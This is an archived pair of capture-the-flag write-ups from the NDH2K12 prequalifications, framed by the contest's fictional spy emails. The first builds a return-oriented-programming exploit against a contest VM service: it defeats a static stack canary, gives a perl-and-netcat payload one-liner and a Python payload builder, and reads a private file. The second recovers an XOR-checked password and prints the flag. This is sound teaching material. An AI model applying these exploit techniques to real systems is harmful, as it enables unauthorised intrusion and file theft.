NDH2K12 Prequals: web3.ndh writeup (port 4005)

Written by Franck Michea, 2012-03-25 00:41:00

This article was originally written for the LSE Blog with w4kfu. It was archived here. Check this awesome blog out too!

From: Piotr <piotr@megacortek.com>
To: LSE <lse@megacortek.com>
Subject: Another weird link
Attachments : web3.ndh

Thank you again for this information! We have just credited your account
with $1700. Our spy thinks that Sciteek staff is aware about the mole
inside their building. He is trying to read a private file named
"sciteek-private.txt" located at sciteek.nuitduhack.com:4005. Please find
the .ndh attached; if you are successful, reply with a message entitled
"complex remote service".

Of course, your efforts will be rewarded with $2500. Maybe you will find
pieces of information about the mole.

Piotr

As before, we can run this .ndh file in the VM we have in order to understand the program's behavior, but this time we also had an IDA plugin to help us.

The program reserves 0x200 bytes for the received buffer and places a canary on the stack at offset 0x200 to catch stack-based buffer overflows. But the canary is always the same value, 0xbeef, so this protection is easy to bypass: we simply write the known value back in place.

Another protection has been set up on this challenge: the NX bit. Unlike service 4004, we won't be able to execute code from our buffer, so we use ROP techniques to bypass it.

We found an excellent sub function (like in service 4000), "disp_file_content": it opens the file whose name is pointed to by R0, seeks to the end to get its size, reads the whole content onto the stack, NUL-terminates it and sends it through write_socket.

ROM:8201 disp_file_content:
ROM:8201                 PUSH           R1
ROM:8204                 PUSH           R2
ROM:8207                 PUSH           R3
ROM:820A                 PUSH           R4
ROM:820D                 PUSH           R5
ROM:8210                 MOVL           R1, 0
ROM:8215                 CALL           SYSCALL_OPEN
ROM:8219                 CMPL           R0, $FFFF
ROM:821E                 JNZ            file_valid
ROM:8221                 XOR            R0, R0
ROM:8225                 POP            R5
ROM:8227                 POP            R4
ROM:8229                 POP            R3
ROM:822B                 POP            R2
ROM:822D                 POP            R1
ROM:822F                 RET
ROM:8230 ; ---------------------------------------------------------------------------
ROM:8230
ROM:8230 file_valid:                             ; CODE XREF: disp_file_content+1D
ROM:8230                 MOV            R3, R0
ROM:8234                 MOVL           R1, 0
ROM:8239                 MOVL           R2, $2
ROM:823E                 CALL           SYSCALL_FSEEK
ROM:8242                 MOV            R4, R0
ROM:8246                 INC            R4
ROM:8248                 MOV            R0, R3
ROM:824C                 MOVL           R1, 0
ROM:8251                 MOVL           R2, 0
ROM:8256                 CALL           SYSCALL_FSEEK
ROM:825A                 SUB            SP, R4
ROM:825E                 MOV            R5, SP
ROM:8262                 MOV            R0, R3
ROM:8266                 MOV            R1, SP
ROM:826A                 MOV            R2, R4
ROM:826E                 CALL           SYSCALL_READ
ROM:8272                 ADD            R4, R5
ROM:8276                 DEC            R4
ROM:8278                 MOVBT          R4, 0
ROM:827C                 MOV            R0, R5
ROM:8280                 CALL           write_socket
ROM:8284                 MOVB           R0, 1
ROM:8288                 INC            R4
ROM:828A                 SUB            R4, R5
ROM:828E                 ADD            SP, R4
ROM:8292                 POP            R5
ROM:8294                 POP            R4
ROM:8296                 POP            R3
ROM:8298                 POP            R2
ROM:829A                 POP            R1
ROM:829C                 RET
ROM:829C ; End of function disp_file_content

Before calling this function we have to make R0 point to the required file name ("sciteek-private.txt"), which we place at the start of our buffer.

We will use these simple gadgets to change the value of R0 and exit the program cleanly:

ROM:80BD                 POP            R0
ROM:80BF                 RET

[...]

ROM:838C                 END

The layout of the exploit buffer looks like this (the file name sits at the beginning of the buffer, the NULL padding fills it up to offset 0x200, then comes the canary value, then the ROP chain):

[file_name] [NULL_PADDING] [POP_R0;RET] [ADDR_BUFF] [disp_file_content] [END]

Here is the final exploit (16-bit little-endian words: 0xbeef is the canary, 0x80bd the POP R0; RET gadget, 0x7bf4 the address of our buffer on the stack, 0x8201 disp_file_content and 0x838c the END gadget):

perl -e 'print "sciteek-private.txt" . "\x00"x493 . "\xef\xbe" . "\xbd\x80" . "\xf4\x7b" . "\x01\x82" . "\x8c\x83"' | nc sciteek.nuitduhack.com 4005
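To make the arithmetic of the one-liner explicit, here is an added Python builder for the same buffer layout (not code from the original post). It uses the addresses from the writeup; the buffer address 0x7bf4 and the buffer size 0x200 are taken from the one-liner and the text above, and the function checks that the file name plus padding fills exactly 0x200 bytes before the canary, which is the property the static 0xbeef canary fails to protect.

```python
import struct

# Constants taken from the writeup (NDH VM: 16-bit, little-endian words).
BUF_SIZE = 0x200            # receive buffer reserved by the program
CANARY = 0xBEEF             # static canary checked at offset 0x200
POP_R0_RET = 0x80BD         # gadget: POP R0; RET
DISP_FILE_CONTENT = 0x8201  # function that opens/reads/sends the file named by R0
END_GADGET = 0x838C         # END instruction: terminate the program cleanly
BUF_ADDR = 0x7BF4           # stack address of the received buffer (from the one-liner)


def u16(value: int) -> bytes:
    """Pack one 16-bit word the way the VM stores it on the stack."""
    return struct.pack("<H", value)


def build_payload(filename: bytes, buf_addr: int = BUF_ADDR) -> bytes:
    """Return [file_name][NULL padding][canary][POP R0;RET][buf_addr][disp_file_content][END].

    The NULL padding both terminates the file name string and fills the
    buffer up to the canary slot, so the chain lands where RET will pop it.
    """
    if b"\x00" in filename:
        raise ValueError("file name must not contain NUL")
    if len(filename) >= BUF_SIZE:
        raise ValueError("file name does not fit in the buffer with its terminator")
    padding = b"\x00" * (BUF_SIZE - len(filename))
    chain = u16(CANARY) + u16(POP_R0_RET) + u16(buf_addr) + u16(DISP_FILE_CONTENT) + u16(END_GADGET)
    payload = filename + padding + chain
    assert len(filename) + len(padding) == BUF_SIZE
    return payload


def padding_length(filename: bytes) -> int:
    """Number of NUL bytes the one-liner needs for this file name."""
    return BUF_SIZE - len(filename)


if __name__ == "__main__":
    p = build_payload(b"sciteek-private.txt")
    print(len(p), "bytes, padding =", padding_length(b"sciteek-private.txt"))
```

The value returned by `build_payload(b"sciteek-private.txt")` is byte-for-byte the output of the perl command above; `padding_length` reproduces the 493 used there (0x200 minus the 19-byte file name).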

Dear Patrick,

We found much evidence proving there is a mole inside our company who is selling confidential materials to our main competitor, Megacortek. We have very good reasons to believe that Walter Smith has sent some emails to a contact at Megacortek, containing confidential information.

However, these emails seem to have been encrypted and sometimes contain images or audio files which are apparently not related with our company or our business, but one of them contains an archive with an explicit name.

We cannot stand this situation anymore, and we should take actions to make Mr Smith leave the company: we can fire this guy or why not call the FBI to handle this case as it should be.

Sincerely,

David Markham.

NDH2K12 Prequals: executable1.ndh writeup (port 4001)

Written by Franck Michea, 2012-03-25 00:40:00

This article was originally written for the LSE Blog. It was archived here. Check this awesome blog out too!

From: Jessica <jessica@megacortek.com>
To: LSE <lse@megacortek.com>
Subject: unknown binary, need your help
Attachments : executable1.ndh

Hello again,

Thank you very much for your help. It is amazing that our technical staff and
experts did not manage to recover any of it: the password sounds pretty weak.
I will notify our head of technical staff.

Anyway, I forwarded them the file for further investigation. Meanwhile, we got
fresh news from our mystery guy. He came along with an interesting binary file.
It just looks like an executable, but it is not ELF nor anything our experts
would happen to know or recognize. Some of them were quite impressed by your skills
and do think you may be able to succeed here. I attached the file; if you discover
anything, please send me an email entitled "Strange binary file".

This will be rewarded, as usual. By the way, your account has just been credited
with $100.

Regards,
Jessica.

This was the first binary of the contest. We had just cracked the RAR archive of the first exercise, so we had the actual VM written in C together with its debugger. While waiting for the IDA plugin, we started looking at what the binary was doing through the disassembly given by the debugger.

The program first printed a login prompt and then waited for the password input. Looking at the disassembly after entering a password, we easily figured out that it computed the strlen of the password entered and checked that it was 8 characters long.

It then XORed each character, one by one, with a byte stored in memory and compared the result against an expected value. Character by character, with the help of breakpoints in the debugger, we dumped the expected values and got the password: zApli8oW
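As an added example (not code from the original post), the following Python models the check described above and shows why it leaks the password: when the binary stores a XOR key and the expected results side by side, recovering the password is a single XOR of the two tables, and a byte-by-byte comparison that stops at the first mismatch also tells a debugger user exactly which position is wrong. The key and expected bytes below are constructed so that they decode to the writeup's password; the real bytes in executable1.ndh are not given in the post. The hardened variant at the end, which stores only a hash and compares in constant time, is a suggestion of ours, not something the challenge binary does.

```python
import hashlib
import hmac

PASSWORD_LEN = 8

# Constructed sample tables (assumption: the binary's actual key/expected bytes are
# not reproduced in the writeup). They are built so that key XOR expected == "zApli8oW".
SAMPLE_KEY = bytes([0x13, 0x37, 0xC0, 0xDE, 0xBA, 0xBE, 0x42, 0x99])
SAMPLE_EXPECTED = bytes([0x69, 0x76, 0xB0, 0xB2, 0xD3, 0x86, 0x2D, 0xCE])


def check_password_xor(candidate: bytes, key: bytes, expected: bytes) -> int:
    """Model of the binary's check. Returns -1 on success, otherwise the index of the
    first failing comparison (or PASSWORD_LEN when the length test fails).

    Returning the failing index mirrors what a debugger user observes when single
    stepping: the early exit reveals how many leading characters were right.
    """
    if len(candidate) != PASSWORD_LEN:
        return PASSWORD_LEN
    for i in range(PASSWORD_LEN):
        if (candidate[i] ^ key[i]) != expected[i]:
            return i
    return -1


def recover_password(key: bytes, expected: bytes) -> bytes:
    """XOR is its own inverse: candidate[i] must equal expected[i] ^ key[i].
    Dumping the two tables from memory therefore yields the password directly."""
    return bytes(e ^ k for e, k in zip(expected, key))


# Hardened alternative (our suggestion): store a salted hash, compare in constant time.
SAMPLE_SALT = b"ndh2k12-sample-salt"  # constructed; a real deployment uses a random salt


def password_digest(candidate: bytes, salt: bytes = SAMPLE_SALT) -> bytes:
    return hashlib.sha256(salt + candidate).digest()


def check_password_hashed(candidate: bytes, stored_digest: bytes, salt: bytes = SAMPLE_SALT) -> bool:
    """compare_digest does not stop at the first differing byte, so the check no
    longer reveals which position failed; the digest alone does not give the password."""
    return hmac.compare_digest(password_digest(candidate, salt), stored_digest)


if __name__ == "__main__":
    pw = recover_password(SAMPLE_KEY, SAMPLE_EXPECTED)
    print("recovered:", pw.decode())
    print("xor check:", check_password_xor(pw, SAMPLE_KEY, SAMPLE_EXPECTED))
    print("hashed check:", check_password_hashed(pw, password_digest(pw)))
```

With the sample tables, `recover_password` returns `b"zApli8oW"` and the XOR check accepts it; a wrong candidate such as `b"zApli8oX"` fails at index 7, which is exactly the position-by-position leak the debugger session exploited.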

Entering it in the service running on remote port 4001 gave the flag:

<PSP version="1.99">
<MOTD>
<![CDATA[
Welcome on SciPad Protected Storage.

The most secure storage designed by Sciteek. This storage protocol
allows our users to share files in the cloud, in a dual way.

This daemon has been optimized for SciPad v1, running SciOS 16bits
with our brand new processor.
]]>
</MOTD>
<FLAG>
ea1670464251ea3b65afd624d9b17cd7
</FLAG>
<ERROR>
An unexpected error occured: PSP-UNK-ERR-001> application closed.
</ERROR>
</PSP>

Easy one, but nice.